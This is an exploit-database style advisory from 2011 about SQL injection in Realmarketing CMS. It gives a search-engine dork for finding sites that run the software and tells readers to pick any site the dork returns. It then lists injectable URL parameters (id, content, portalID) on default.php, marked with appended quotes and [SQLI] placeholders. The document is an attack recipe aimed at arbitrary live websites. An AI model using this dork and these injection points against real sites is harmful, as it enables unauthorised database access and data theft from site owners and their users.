#(+)Exploit Title: Realmarketing CMS System Sensitive Database Disclosure Vulnerability#(+)Author : ^Xecuti0n3r#(+) Date: 22.04.2011#(+) Hour: 13:37 PM#(+) E-mail:xecuti0n3r()yahoo.com#(+) dork: intext:realweb.de inurl:default.php#(+) Category: Web Apps [SQli]
____________________________________________________________________
____________________________________________________________________
Choose any site that comes up when you enter the dork intext:"intext:realweb.de inurl:default.php"in search engine
*SQL injection Vulnerability*#[+]http://site.com/default.php?id='125#[+]http://site.com/default.php?id=[SQLI]#[+]http://site.com/default.php?content='2485#[+]http://site.com/default.php?content=[SQLI]#[+]http://site.com/default.php?portalID='68#[+]http://site.com/default.php?portalID=[SQLI]#[+]http://site.com/default.php?&id='121#[+]http://site.com/default.php?&id=[SQLI]
____________________________________________________________________
____________________________________________________________________
########################################################################(+)Exploit Coded by:^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################